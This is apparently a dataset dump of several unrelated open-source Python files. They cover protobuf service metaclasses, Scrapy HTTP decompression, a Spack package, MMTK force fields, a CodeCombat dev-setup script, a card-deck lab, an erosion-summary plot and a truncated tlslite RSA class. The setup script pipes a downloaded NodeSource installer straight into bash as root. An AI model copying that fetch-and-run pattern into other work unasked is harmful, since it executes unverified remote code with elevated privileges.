# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Contains metaclasses used to create protocol service and service stub
classes from ServiceDescriptor objects at runtime.
The GeneratedServiceType and GeneratedServiceStubType metaclasses are used to
inject all useful functionality into the classes output by the protocol
compiler at compile-time.
"""
__author__ = '[email protected] (Petar Petrov)'
class GeneratedServiceType(type):
"""Metaclass for service classes created at runtime from ServiceDescriptors.
Implementations for all methods described in the Service class are added here
by this class. We also create properties to allow getting/setting all fields
in the protocol message.
The protocol compiler currently uses this metaclass to create protocol service
classes at runtime. Clients can also manually create their own classes at
runtime, as in this example:
mydescriptor = ServiceDescriptor(.....)
class MyProtoService(service.Service):
__metaclass__ = GeneratedServiceType
DESCRIPTOR = mydescriptor
myservice_instance = MyProtoService()
...
"""
_DESCRIPTOR_KEY = 'DESCRIPTOR'
def __init__(cls, name, bases, dictionary):
"""Creates a message service class.
Args:
name: Name of the class (ignored, but required by the metaclass
protocol).
bases: Base classes of the class being constructed.
dictionary: The class dictionary of the class being constructed.
dictionary[_DESCRIPTOR_KEY] must contain a ServiceDescriptor object
describing this protocol service type.
"""
# Don't do anything if this class doesn't have a descriptor. This happens
# when a service class is subclassed.
if GeneratedServiceType._DESCRIPTOR_KEY not in dictionary:
return
descriptor = dictionary[GeneratedServiceType._DESCRIPTOR_KEY]
service_builder = _ServiceBuilder(descriptor)
service_builder.BuildService(cls)
class GeneratedServiceStubType(GeneratedServiceType):
"""Metaclass for service stubs created at runtime from ServiceDescriptors.
This class has similar responsibilities as GeneratedServiceType, except that
it creates the service stub classes.
"""
_DESCRIPTOR_KEY = 'DESCRIPTOR'
def __init__(cls, name, bases, dictionary):
"""Creates a message service stub class.
Args:
      name: Name of the class (ignored here).
bases: Base classes of the class being constructed.
dictionary: The class dictionary of the class being constructed.
dictionary[_DESCRIPTOR_KEY] must contain a ServiceDescriptor object
describing this protocol service type.
"""
super(GeneratedServiceStubType, cls).__init__(name, bases, dictionary)
# Don't do anything if this class doesn't have a descriptor. This happens
# when a service stub is subclassed.
if GeneratedServiceStubType._DESCRIPTOR_KEY not in dictionary:
return
descriptor = dictionary[GeneratedServiceStubType._DESCRIPTOR_KEY]
service_stub_builder = _ServiceStubBuilder(descriptor)
service_stub_builder.BuildServiceStub(cls)
class _ServiceBuilder(object):
"""This class constructs a protocol service class using a service descriptor.
Given a service descriptor, this class constructs a class that represents
the specified service descriptor. One service builder instance constructs
exactly one service class. That means all instances of that class share the
same builder.
"""
def __init__(self, service_descriptor):
"""Initializes an instance of the service class builder.
Args:
service_descriptor: ServiceDescriptor to use when constructing the
service class.
"""
self.descriptor = service_descriptor
def BuildService(self, cls):
"""Constructs the service class.
Args:
cls: The class that will be constructed.
"""
# CallMethod needs to operate with an instance of the Service class. This
# internal wrapper function exists only to be able to pass the service
# instance to the method that does the real CallMethod work.
def _WrapCallMethod(srvc, method_descriptor,
rpc_controller, request, callback):
return self._CallMethod(srvc, method_descriptor,
rpc_controller, request, callback)
self.cls = cls
cls.CallMethod = _WrapCallMethod
cls.GetDescriptor = staticmethod(lambda: self.descriptor)
cls.GetDescriptor.__doc__ = "Returns the service descriptor."
cls.GetRequestClass = self._GetRequestClass
cls.GetResponseClass = self._GetResponseClass
for method in self.descriptor.methods:
setattr(cls, method.name, self._GenerateNonImplementedMethod(method))
def _CallMethod(self, srvc, method_descriptor,
rpc_controller, request, callback):
"""Calls the method described by a given method descriptor.
Args:
srvc: Instance of the service for which this method is called.
method_descriptor: Descriptor that represent the method to call.
rpc_controller: RPC controller to use for this method's execution.
request: Request protocol message.
callback: A callback to invoke after the method has completed.
"""
if method_descriptor.containing_service != self.descriptor:
raise RuntimeError(
'CallMethod() given method descriptor for wrong service type.')
method = getattr(srvc, method_descriptor.name)
return method(rpc_controller, request, callback)
def _GetRequestClass(self, method_descriptor):
"""Returns the class of the request protocol message.
Args:
method_descriptor: Descriptor of the method for which to return the
request protocol message class.
Returns:
A class that represents the input protocol message of the specified
method.
"""
if method_descriptor.containing_service != self.descriptor:
raise RuntimeError(
'GetRequestClass() given method descriptor for wrong service type.')
return method_descriptor.input_type._concrete_class
def _GetResponseClass(self, method_descriptor):
"""Returns the class of the response protocol message.
Args:
method_descriptor: Descriptor of the method for which to return the
response protocol message class.
Returns:
A class that represents the output protocol message of the specified
method.
"""
if method_descriptor.containing_service != self.descriptor:
raise RuntimeError(
'GetResponseClass() given method descriptor for wrong service type.')
return method_descriptor.output_type._concrete_class
def _GenerateNonImplementedMethod(self, method):
"""Generates and returns a method that can be set for a service methods.
Args:
method: Descriptor of the service method for which a method is to be
generated.
Returns:
A method that can be added to the service class.
"""
return lambda inst, rpc_controller, request, callback: (
self._NonImplementedMethod(method.name, rpc_controller, callback))
def _NonImplementedMethod(self, method_name, rpc_controller, callback):
"""The body of all methods in the generated service class.
Args:
method_name: Name of the method being executed.
rpc_controller: RPC controller used to execute this method.
callback: A callback which will be invoked when the method finishes.
"""
rpc_controller.SetFailed('Method %s not implemented.' % method_name)
callback(None)
class _ServiceStubBuilder(object):
"""Constructs a protocol service stub class using a service descriptor.
Given a service descriptor, this class constructs a suitable stub class.
A stub is just a type-safe wrapper around an RpcChannel which emulates a
local implementation of the service.
One service stub builder instance constructs exactly one class. It means all
instances of that class share the same service stub builder.
"""
def __init__(self, service_descriptor):
"""Initializes an instance of the service stub class builder.
Args:
service_descriptor: ServiceDescriptor to use when constructing the
stub class.
"""
self.descriptor = service_descriptor
def BuildServiceStub(self, cls):
"""Constructs the stub class.
Args:
cls: The class that will be constructed.
"""
def _ServiceStubInit(stub, rpc_channel):
stub.rpc_channel = rpc_channel
self.cls = cls
cls.__init__ = _ServiceStubInit
for method in self.descriptor.methods:
setattr(cls, method.name, self._GenerateStubMethod(method))
def _GenerateStubMethod(self, method):
return (lambda inst, rpc_controller, request, callback=None:
self._StubMethod(inst, method, rpc_controller, request, callback))
def _StubMethod(self, stub, method_descriptor,
rpc_controller, request, callback):
"""The body of all service methods in the generated stub class.
Args:
stub: Stub instance.
method_descriptor: Descriptor of the invoked method.
rpc_controller: Rpc controller to execute the method.
request: Request protocol message.
callback: A callback to execute when the method finishes.
Returns:
Response message (in case of blocking call).
"""
return stub.rpc_channel.CallMethod(
method_descriptor, rpc_controller, request,
method_descriptor.output_type._concrete_class, callback)
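# A minimal usage sketch for the stub machinery above. The names
# SearchService_Stub, MyRpcChannel, MyRpcController, and SearchRequest are
# hypothetical stand-ins for a protoc-generated stub class and an
# application-provided RpcChannel/RpcController pair (see
# google.protobuf.service):
#
#   channel = MyRpcChannel('searchhost:1234')
#   controller = MyRpcController()
#   stub = SearchService_Stub(channel)  # __init__ installed by BuildServiceStub
#   request = SearchRequest(query='protobuf')
#   # Each generated stub method forwards to channel.CallMethod() with the
#   # method's descriptor and its concrete response class:
#   stub.Search(controller, request, callback=lambda response: None)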
| bsd-3-clause |
taito/scrapy | scrapy/downloadermiddlewares/httpcompression.py | 17 | 2605 | import zlib
from scrapy.utils.gz import gunzip
from scrapy.http import Response, TextResponse
from scrapy.responsetypes import responsetypes
from scrapy.exceptions import NotConfigured
ACCEPTED_ENCODINGS = [b'gzip', b'deflate']
try:
import brotli
ACCEPTED_ENCODINGS.append(b'br')
except ImportError:
pass
class HttpCompressionMiddleware(object):
"""This middleware allows compressed (gzip, deflate) traffic to be
sent/received from web sites"""
@classmethod
def from_crawler(cls, crawler):
if not crawler.settings.getbool('COMPRESSION_ENABLED'):
raise NotConfigured
return cls()
def process_request(self, request, spider):
request.headers.setdefault('Accept-Encoding',
b",".join(ACCEPTED_ENCODINGS))
def process_response(self, request, response, spider):
if request.method == 'HEAD':
return response
if isinstance(response, Response):
content_encoding = response.headers.getlist('Content-Encoding')
if content_encoding:
encoding = content_encoding.pop()
decoded_body = self._decode(response.body, encoding.lower())
                respcls = responsetypes.from_args(headers=response.headers,
                                                  url=response.url, body=decoded_body)
kwargs = dict(cls=respcls, body=decoded_body)
if issubclass(respcls, TextResponse):
# force recalculating the encoding until we make sure the
# responsetypes guessing is reliable
kwargs['encoding'] = None
response = response.replace(**kwargs)
if not content_encoding:
del response.headers['Content-Encoding']
return response
def _decode(self, body, encoding):
if encoding == b'gzip' or encoding == b'x-gzip':
body = gunzip(body)
if encoding == b'deflate':
try:
body = zlib.decompress(body)
except zlib.error:
# ugly hack to work with raw deflate content that may
# be sent by microsoft servers. For more information, see:
# http://carsten.codimi.de/gzip.yaws/
# http://www.port80software.com/200ok/archive/2005/10/31/868.aspx
# http://www.gzip.org/zlib/zlib_faq.html#faq38
body = zlib.decompress(body, -15)
if encoding == b'br' and b'br' in ACCEPTED_ENCODINGS:
body = brotli.decompress(body)
return body
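# A self-contained sketch of the cases _decode() above has to handle, using
# only the standard library (scrapy's gunzip() helper is not used here):
#
#   import zlib
#   raw = b'hello world'
#   # 'deflate' from a well-behaved server is a zlib-wrapped stream:
#   assert zlib.decompress(zlib.compress(raw)) == raw
#   # Some servers send raw deflate with no zlib header, which is why
#   # _decode() falls back to zlib.decompress(body, -15):
#   co = zlib.compressobj(9, zlib.DEFLATED, -15)
#   raw_deflate = co.compress(raw) + co.flush()
#   assert zlib.decompress(raw_deflate, -15) == raw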
| bsd-3-clause |
TheTimmy/spack | var/spack/repos/builtin/packages/listres/package.py | 3 | 1832 | ##############################################################################
# Copyright (c) 2013-2017, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Listres(AutotoolsPackage):
"""The listres program generates a list of X resources for a widget
in an X client written using a toolkit based on libXt."""
homepage = "http://cgit.freedesktop.org/xorg/app/listres"
url = "https://www.x.org/archive/individual/app/listres-1.0.3.tar.gz"
version('1.0.3', '77cafc32e8e02cca2d4453e73e0c0e7d')
depends_on('libxaw')
depends_on('libxt')
depends_on('libxmu')
depends_on('xproto', type='build')
depends_on('[email protected]:', type='build')
depends_on('util-macros', type='build')
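# Usage sketch (shell commands, assuming a working Spack checkout):
#   $ spack spec listres       # show the concretized dependency tree
#   $ spack install listres    # build listres and its X11 dependencies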
| lgpl-2.1 |
Eureka22/ASM_xf | PythonD/site_python/MMTK/ForceFields/BondedInteractions.py | 2 | 5390 | # This module implements classes that represent force fields
# for bonded interactions.
#
# Written by Konrad Hinsen
# last revision: 2000-2-10
#
_undocumented = 1
from ForceField import ForceField, ForceFieldData
from MMTK import Utility
from Scientific.Geometry import Vector
import Numeric
#
# The base class BondedForceField provides the common
# functionality for all bonded interactions. The derived
# classes have to deal with determining functional forms
# and parameters and providing the evaluation code.
#
class BondedForceField(ForceField):
def __init__(self, name):
ForceField.__init__(self, name)
self.type = 'bonded'
def evaluatorTerms(self, universe, subset1, subset2, global_data):
data = ForceFieldData()
if subset1 is not None:
label1 = Utility.uniqueAttribute()
label2 = Utility.uniqueAttribute()
for atom in subset1.atomList():
setattr(atom, label1, None)
for atom in subset2.atomList():
setattr(atom, label2, None)
for o in universe:
for bu in o.bondedUnits():
if not hasattr(bu, 'bonds'): continue
options = {'bonds': 1, 'bond_angles': 1,
'dihedrals': 1, 'impropers': 1}
self.getOptions(bu, options)
if options['bonds']:
if subset1 is None:
for bond in bu.bonds:
self.addBondTerm(data, bond, bu, global_data)
else:
for bond in bu.bonds:
atoms = [bond.a1, bond.a2]
if _checkSubset(atoms, label1, label2):
self.addBondTerm(data, bond, bu, global_data)
if options['bond_angles']:
if subset1 is None:
for angle in bu.bonds.bondAngles():
self.addBondAngleTerm(data, angle, bu, global_data)
else:
for angle in bu.bonds.bondAngles():
atoms = [angle.a1, angle.a2, angle.ca]
if _checkSubset(atoms, label1, label2):
self.addBondAngleTerm(data, angle, bu,
global_data)
d = options['dihedrals']
i = options['impropers']
if d or i:
if subset1 is None:
for angle in bu.bonds.dihedralAngles():
if angle.improper and i:
self.addImproperTerm(data, angle, bu,
global_data)
elif not angle.improper and d:
self.addDihedralTerm(data, angle, bu,
global_data)
else:
for angle in bu.bonds.dihedralAngles():
atoms = [angle.a1, angle.a2, angle.a3, angle.a4]
if _checkSubset(atoms, label1, label2):
if angle.improper and i:
self.addImproperTerm(data, angle, bu,
global_data)
elif not angle.improper and d:
self.addDihedralTerm(data, angle, bu,
global_data)
if subset1 is not None:
for atom in subset1.atomList():
delattr(atom, label1)
for atom in subset2.atomList():
delattr(atom, label2)
global_data.add('initialized', 'bonded')
from MMTK_forcefield import HarmonicDistanceTerm, HarmonicAngleTerm, \
CosineDihedralTerm
eval_list = []
bonds = data.get('bonds')
if bonds:
import sys
main = sys.modules['__main__']
indices = Numeric.array(map(lambda b: b[:2], bonds))
parameters = Numeric.array(map(lambda b: b[2:], bonds))
## setattr(main, 'indices', indices)
## setattr(main, 'parameters', parameters)
## print parameters
eval_list.append(HarmonicDistanceTerm(universe._spec,
indices, parameters))
angles = data.get('angles')
if angles:
indices = Numeric.array(map(lambda a: a[:3], angles))
parameters = Numeric.array(map(lambda a: a[3:], angles))
eval_list.append(HarmonicAngleTerm(universe._spec,
indices, parameters))
dihedrals = data.get('dihedrals')
if dihedrals:
def _dihedral_parameters(p):
return [p[4], Numeric.cos(p[5]), Numeric.sin(p[5]), p[6]]
indices = Numeric.array(map(lambda d: d[:4], dihedrals))
parameters = Numeric.array(map(_dihedral_parameters, dihedrals))
eval_list.append(CosineDihedralTerm(universe._spec,
indices, parameters))
return eval_list
def bondedForceFields(self):
return [self]
# The following methods must be overridden by derived classes.
def addBondTerm(self, data, bond, object, global_data):
raise AttributeError
def addBondAngleTerm(self, data, angle, object, global_data):
raise AttributeError
def addDihedralTerm(self, data, dihedral, object, global_data):
raise AttributeError
def addImproperTerm(self, data, improper, object, global_data):
raise AttributeError
def evalObject(self, global_data):
raise AttributeError
# The following methods are recommended for derived classes.
# They allow to read out the force field specification, e.g. for
# interfacing to other programs.
def bonds(self, global_data):
raise AttributeError
def angles(self, global_data):
raise AttributeError
def dihedrals(self, global_data):
raise AttributeError
# Check if an energy term matches the specified atom subset
def _checkSubset(atoms, label1, label2):
s1 = 0
s2 = 0
for a in atoms:
flag = 0
if hasattr(a, label1):
s1 = 1
flag = 1
if hasattr(a, label2):
s2 = 1
flag = 1
if not flag:
return 0
return s1 and s2
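# A minimal sketch of a concrete force field built on BondedForceField. The
# numeric parameters and the per-term tuple layout (indices first, then
# parameters, as sliced apart in evaluatorTerms above) are assumptions here;
# a real force field would look them up in a parameter database:
#
# class SimpleHarmonicBondForceField(BondedForceField):
#     def __init__(self):
#         BondedForceField.__init__(self, 'simple_harmonic_bonds')
#     def addBondTerm(self, data, bond, object, global_data):
#         # (atom_index_1, atom_index_2, equilibrium_length, force_constant)
#         data.add('bonds', (bond.a1.index, bond.a2.index, 0.15, 250000.))
#     def addBondAngleTerm(self, data, angle, object, global_data):
#         pass  # angles ignored in this sketch
#     def addDihedralTerm(self, data, dihedral, object, global_data):
#         pass
#     def addImproperTerm(self, data, improper, object, global_data):
#         pass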
| gpl-2.0 |
bkiehl/lol | scripts/devSetup/factories.py | 70 | 8066 | __author__ = u'schmatz'
import errors
import configuration
import mongo
import node
import repositoryInstaller
import ruby
import shutil
import os
import glob
import subprocess
def print_computer_information(os_name,address_width):
print(os_name + " detected, architecture: " + str(address_width) + " bit")
def constructSetup():
config = configuration.Configuration()
address_width = config.system.get_virtual_memory_address_width()
if config.system.operating_system == u"mac":
print_computer_information("Mac",address_width)
return MacSetup(config)
elif config.system.operating_system == u"win":
print_computer_information("Windows",address_width)
raise NotImplementedError("Windows is not supported at this time.")
elif config.system.operating_system == u"linux":
print_computer_information("Linux",address_width)
return LinuxSetup(config)
class SetupFactory(object):
def __init__(self,config):
self.config = config
self.mongo = mongo.MongoDB(self.config)
self.node = node.Node(self.config)
self.repoCloner = repositoryInstaller.RepositoryInstaller(self.config)
self.ruby = ruby.Ruby(self.config)
def setup(self):
mongo_version_string = ""
try:
mongo_version_string = subprocess.check_output("mongod --version",shell=True)
mongo_version_string = mongo_version_string.decode(encoding='UTF-8')
except Exception as e:
print("Mongod not found: %s"%e)
if "v2.6." not in mongo_version_string:
if mongo_version_string:
print("Had MongoDB version: %s"%mongo_version_string)
print("MongoDB not found, so installing a local copy...")
self.mongo.download_dependencies()
self.mongo.install_dependencies()
self.node.download_dependencies()
self.node.install_dependencies()
#self.repoCloner.cloneRepository()
self.repoCloner.install_node_packages()
self.ruby.install_gems()
print ("Doing initial bower install...")
bower_path = self.config.directory.root_dir + os.sep + "coco" + os.sep + "node_modules" + os.sep + ".bin" + os.sep + "bower"
subprocess.call(bower_path + " --allow-root install",shell=True,cwd=self.config.directory.root_dir + os.sep + "coco")
print("Removing temporary directories")
self.config.directory.remove_tmp_directory()
print("Changing permissions of files...")
#TODO: Make this more robust and portable(doesn't pose security risk though)
subprocess.call("chmod -R 755 " + self.config.directory.root_dir + os.sep + "coco" + os.sep + "bin",shell=True)
chown_command = "chown -R " + os.getenv("SUDO_USER") + " bower_components"
chown_directory = self.config.directory.root_dir + os.sep + "coco"
subprocess.call(chown_command,shell=True,cwd=chown_directory)
print("")
print("Done! If you want to start the server, head into coco/bin and run ")
print("1. ./coco-mongodb")
print("2. ./coco-brunch ")
print("3. ./coco-dev-server")
print("NOTE: brunch may need to be run as sudo if it doesn't work (ulimit needs to be set higher than default)")
print("")
print("Before can play any levels you must update the database. See the Setup section here:")
print("https://github.com/codecombat/codecombat/wiki/Dev-Setup:-Linux#installing-the-database")
print("")
print("Go to http://localhost:3000 to see your local CodeCombat in action!")
def cleanup(self):
self.config.directory.remove_tmp_directory()
class MacSetup(SetupFactory):
def setup(self):
super(self.__class__, self).setup()
class WinSetup(SetupFactory):
def setup(self):
super(self.__class__, self).setup()
class LinuxSetup(SetupFactory):
def setup(self):
self.distroSetup()
super(self.__class__, self).setup()
def detectDistro(self):
distro_checks = {
"arch": "/etc/arch-release",
"ubuntu": "/etc/lsb-release"
}
for distro, path in distro_checks.items():
if os.path.exists(path):
return(distro)
def distroSetup(self):
distro = self.detectDistro()
if distro == "ubuntu":
print("Ubuntu installation detected. Would you like to install \n"
"NodeJS and MongoDB via apt-get? [y/N]")
if raw_input().lower() in ["y", "yes"]:
print("Adding repositories for MongoDB and NodeJS...")
try:
subprocess.check_call(["apt-key", "adv",
"--keyserver",
"hkp://keyserver.ubuntu.com:80",
"--recv", "7F0CEB10"])
subprocess.check_call(["add-apt-repository",
"deb http://downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen"])
subprocess.check_call("curl -sL "
"https://deb.nodesource.com/setup"
" | bash", shell=True)
subprocess.check_call(["apt-get", "update"])
except subprocess.CalledProcessError as err:
print("Adding repositories failed. Retry, Install without"
"adding \nrepositories, Skip apt-get installation, "
"or Abort? [r/i/s/A]")
answer = raw_input().lower()
if answer in ["r", "retry"]:
return(self.distroSetup())
elif answer in ["i", "install"]:
pass
elif answer in ["s", "skip"]:
return()
else:
exit(1)
else:
try:
print("Repositories added successfully. Installing NodeJS and MongoDB.")
subprocess.check_call(["apt-get", "install",
"nodejs", "mongodb-org",
"build-essential", "-y"])
except subprocess.CalledProcessError as err:
print("Installation via apt-get failed. \nContinue "
"with manual installation, or Abort? [c/A]")
if raw_input().lower() in ["c", "continue"]:
return()
else:
exit(1)
else:
print("NodeJS and MongoDB installed successfully. "
"Starting MongoDB.")
#try:
#subprocess.check_call(["service", "mongod", "start"])
#except subprocess.CalledProcessError as err:
#print("Mongo failed to start. Aborting.")
#exit(1)
if distro == "arch":
print("Arch Linux detected. Would you like to install \n"
"NodeJS and MongoDB via pacman? [y/N]")
if raw_input().lower() in ["y", "yes"]:
try:
subprocess.check_call(["pacman", "-S",
"nodejs", "mongodb",
"--noconfirm"])
except subprocess.CalledProcessError as err:
print("Installation failed. Retry, Continue, or "
"Abort? [r/c/A]")
answer = raw_input().lower()
if answer in ["r", "retry"]:
return(self.distroSetup())
elif answer in ["c", "continue"]:
return()
else:
exit(1)
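# Sketch of how a driver script is expected to use this module (the real
# entry point lives elsewhere in scripts/devSetup; this just shows the
# contract exposed above):
#
#   setup = constructSetup()  # picks the Mac or Linux flavor for this machine
#   try:
#       setup.setup()         # install MongoDB/Node plus npm, gem, bower deps
#   finally:
#       setup.cleanup()       # always drop the temporary download directory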
| mit |
helpmoeny/pythoncode | Python_labs/lab09/cards.py | 1 | 3991 | import random # required for shuffle method of Deck
class Card(object):
''' Suit and rank are ints, and index into suit_list and rank_list.
Value is different from rank: for example face cards are equal in value (all 10)
'''
# Use these lists to map the ints of suit and rank to nice words.
# The 'x' is a place holder so that index-2 maps to '2', etc.
suit_list = ['x','c','d','h','s']
rank_list = ['x', 'A', '2', '3', '4', '5', '6', '7', '8', '9', '10','J', 'Q', 'K']
def __init__(self, rank=0, suit=0):
''' Rank and suit must be ints. This checks that they are in the correct range.
Blank card has rank and suit set to 0.
'''
if type(suit) == int and type(rank) == int:
            # only good indices work (rank 1-13, suit 1-4)
            if suit in range(1,5) and rank in range(1,14):
self.__suit = suit
self.__rank = rank
else:
self.__suit = 0
self.__rank = 0
def get_rank(self):
return self.__rank
def get_suit(self):
return self.__suit
## These two "set" methods are for testing: turn them on for testing and
## and then turn off. These allow you to change a card's rand and suit so
## you can test situations that might occur infrequently.
##
## def set_rank(self, rank):
## self.__rank = rank
##
## def set_suit(self, suit):
## self.__suit = suit
def get_value(self):
''' Face cards return 10, the rest return their rank values. Aces are low.
'''
# ternary expression:
return self.__rank if self.__rank < 10 else 10
def equal_suit(self, other):
'''Returns True if suits are equal.'''
return self.__suit == other.__suit
def equal_rank(self, other):
'''Returns True if ranks are equal.'''
return self.__rank == other.__rank
def equal_value(self, other):
'''Returns True if values are equal.'''
return self.get_value() == other.get_value()
def __str__(self):
''' Called by print() so you can print a card, just like any other data structure.
'''
        # Uses rank to index into rank_list of names; uses suit to index into suit_list of names.
return "{:s}{:s}".format((self.rank_list)[self.__rank], (self.suit_list)[self.__suit])
def __repr__(self):
''' This method is called if you simply enter a card name in the shell.
It simply calls, the same method that prints a card.
'''
return self.__str__()
class Deck(object):
''' Deck of cards, implemented as a list of card objects.
The last card in the deck (list) is the top of deck.
'''
def __init__(self):
self.__deck=[Card(rank,suit) for suit in range(1,5) for rank in range(1,14)]
def shuffle(self):
'''Shuffle the deck using a call to random.'''
random.shuffle(self.__deck)
def deal(self):
'''Return the top card from the deck (only if the deck is not empty).'''
# ternary expression
return self.__deck.pop() if len(self.__deck) else None
def cards_count(self):
'''Returns the number of cards in the deck.'''
return len(self.__deck)
def is_empty(self):
'''Returns True if the deck is empty.'''
return len(self.__deck) == 0
def __str__(self):
''' Print a deck, simple but messy!
'''
return ','.join([str(card) for card in self.__deck])
def __repr__(self):
''' Messy print deck, if you enter a deck's name in the shell.
'''
return self.__str__()
def pretty_print(self, column_max=10):
''' Column-oriented printing of a deck.
'''
for index,card in enumerate(self.__deck):
            if index%column_max == 0: # start of a new row, so move to a new line
                print()
            print("{:4s}".format(str(card)), end='')
print()
print()
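if __name__ == '__main__':
    # Small demonstration of the classes above; runs only when this file is
    # executed directly, so lab code importing cards is unaffected.
    deck = Deck()
    deck.shuffle()
    hand = [deck.deal() for _ in range(5)]
    print("Dealt:", ', '.join(str(card) for card in hand))
    print("Cards left in deck:", deck.cards_count())
    c1, c2 = Card(13, 1), Card(10, 2)   # Kc and 10d
    print("K equals 10 in value:", c1.equal_value(c2))  # True: both count as 10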
| unlicense |
akrherz/dep | scripts/cscap/mlra_summary.py | 2 | 2705 | """Summarize for MLRA, somehow"""
import sys
from pandas.io.sql import read_sql
import matplotlib
matplotlib.use("agg")
import matplotlib.pyplot as plt
from pyiem.util import get_dbconn
LABELS = {
29: "CC No-Till",
30: "CS Conv w/ Cover",
31: "CS Conv",
32: "CS Plow",
33: "CS No-Till",
34: "CS No-Till Cover",
35: "CSWC No-Till",
}
def main(argv):
"""Go Main Go"""
mlra_id = int(argv[1])
pgconn = get_dbconn("idep")
fig, ax = plt.subplots(3, 7, figsize=(12, 6))
mlraxref = read_sql(
"""
select mlra_id, mlra_name from mlra
""",
pgconn,
index_col="mlra_id",
)
fig.text(
0.5,
0.96,
("CSCAP Yearly Scenario Changes for MLRA: %s [%s]")
% (mlraxref.at[mlra_id, "mlra_name"], mlra_id),
ha="center",
fontsize=16,
)
for col, scenario in enumerate(range(29, 36)):
df = read_sql(
"""
with myhucs as (
SELECT huc_12 from huc12 where scenario = 0 and mlra_id = %s
)
select r.huc_12, scenario, extract(year from valid)::int as year,
sum(avg_loss) * 4.463 as loss, sum(avg_runoff) as runoff,
sum(avg_delivery) * 4.463 as delivery
from results_by_huc12 r JOIN myhucs h on (r.huc_12 = h.huc_12)
where r.valid >= '2008-01-01' and r.valid < '2017-01-01'
and (scenario = 28 or scenario = %s)
GROUP by r.huc_12, year, scenario
""",
pgconn,
params=(mlra_id, scenario),
index_col=None,
)
gdf = df.groupby(("scenario", "year")).mean()
delta = gdf.loc[(scenario,)] - gdf.loc[(28,)]
for row, varname in enumerate(["runoff", "loss", "delivery"]):
ax[row, col].bar(
delta.index.values,
delta[varname],
color=["b" if x > 0 else "r" for x in delta[varname].values],
)
if row == 0:
ax[row, col].set_title(
"Scenario %s\n%s" % (scenario, LABELS[scenario])
)
ylabels = ["Runoff [mm]", "Loss [T/a]", "Delivery [T/a]"]
for row in range(3):
ymin = 99
ymax = -99
for col in range(7):
ylim = ax[row, col].get_ylim()
ymin = min([ylim[0], ymin])
ymax = max([ylim[1], ymax])
for col in range(7):
ax[row, col].set_ylim(ymin, ymax)
ax[row, col].grid(True)
if col > 0:
ax[row, col].set_yticklabels([])
else:
ax[row, col].set_ylabel(ylabels[row])
fig.savefig("test.png")
if __name__ == "__main__":
main(sys.argv)
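# Invocation sketch: the script takes a single MLRA identifier that must
# exist in the idep database's mlra table (108 is a made-up example) and
# writes its chart to test.png in the current directory:
#   $ python mlra_summary.py 108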
| mit |
CollabQ/CollabQ | vendor/gdata/tlslite/utils/RSAKey.py | 253 | 8575 | """Abstract class for RSA."""
from cryptomath import *
class RSAKey:
"""This is an abstract base class for RSA keys.
Particular implementations of RSA keys, such as
L{OpenSSL_RSAKey.OpenSSL_RSAKey},
L{Python_RSAKey.Python_RSAKey}, and
L{PyCrypto_RSAKey.PyCrypto_RSAKey},
inherit from this.
To create or parse an RSA key, don't use one of these classes
directly. Instead, use the factory functions in
L{tlslite.utils.keyfactory}.
"""
def __init__(self, n=0, e=0):
"""Create a new RSA key.
If n and e are passed in, the new key will be initialized.
@type n: int
@param n: RSA modulus.
@type e: int
@param e: RSA public exponent.
"""
raise NotImplementedError()
def __len__(self):
"""Return the length of this key in bits.
@rtype: int
"""
return numBits(self.n)
def hasPrivateKey(self):
"""Return whether or not this key has a private component.
@rtype: bool
"""
raise NotImplementedError()
def hash(self):
"""Return the cryptoID <keyHash> value corresponding to this
key.
@rtype: str
"""
raise NotImplementedError()
def getSigningAlgorithm(self):
"""Return the cryptoID sigAlgo value corresponding to this key.
@rtype: str
"""
return "pkcs1-sha1"
def hashAndSign(self, bytes):
"""Hash and sign the passed-in bytes.
This requires the key to have a private component. It performs
a PKCS1-SHA1 signature on the passed-in data.
@type bytes: str or L{array.array} of unsigned bytes
@param bytes: The value which will be hashed and signed.
@rtype: L{array.array} of unsigned bytes.
@return: A PKCS1-SHA1 signature on the passed-in data.
"""
if not isinstance(bytes, type("")):
bytes = bytesToString(bytes)
hashBytes = stringToBytes(sha.sha(bytes).digest())
prefixedHashBytes = self._addPKCS1SHA1Prefix(hashBytes)
sigBytes = self.sign(prefixedHashBytes)
return sigBytes
def hashAndVerify(self, sigBytes, bytes):
"""Hash and verify the passed-in bytes with the signature.
This verifies a PKCS1-SHA1 signature on the passed-in data.
@type sigBytes: L{array.array} of unsigned bytes
@param sigBytes: A PKCS1-SHA1 signature.
@type bytes: str or L{array.array} of unsigned bytes
@param bytes: The value which will be hashed and verified.
@rtype: bool
@return: Whether the signature matches the passed-in data.
"""
if not isinstance(bytes, type("")):
bytes = bytesToString(bytes)
hashBytes = stringToBytes(sha.sha(bytes).digest())
prefixedHashBytes = self._addPKCS1SHA1Prefix(hashBytes)
return self.verify(sigBytes, prefixedHashBytes)
def sign(self, bytes):
"""Sign the passed-in bytes.
This requires the key to have a private component. It performs
a PKCS1 signature on the passed-in data.
@type bytes: L{array.array} of unsigned bytes
@param bytes: The value which will be signed.
@rtype: L{array.array} of unsigned bytes.
@return: A PKCS1 signature on the passed-in data.
"""
if not self.hasPrivateKey():
raise AssertionError()
paddedBytes = self._addPKCS1Padding(bytes, 1)
m = bytesToNumber(paddedBytes)
if m >= self.n:
raise ValueError()
c = self._rawPrivateKeyOp(m)
sigBytes = numberToBytes(c)
return sigBytes
def verify(self, sigBytes, bytes):
"""Verify the passed-in bytes with the signature.
This verifies a PKCS1 signature on the passed-in data.
@type sigBytes: L{array.array} of unsigned bytes
@param sigBytes: A PKCS1 signature.
@type bytes: L{array.array} of unsigned bytes
@param bytes: The value which will be verified.
@rtype: bool
@return: Whether the signature matches the passed-in data.
"""
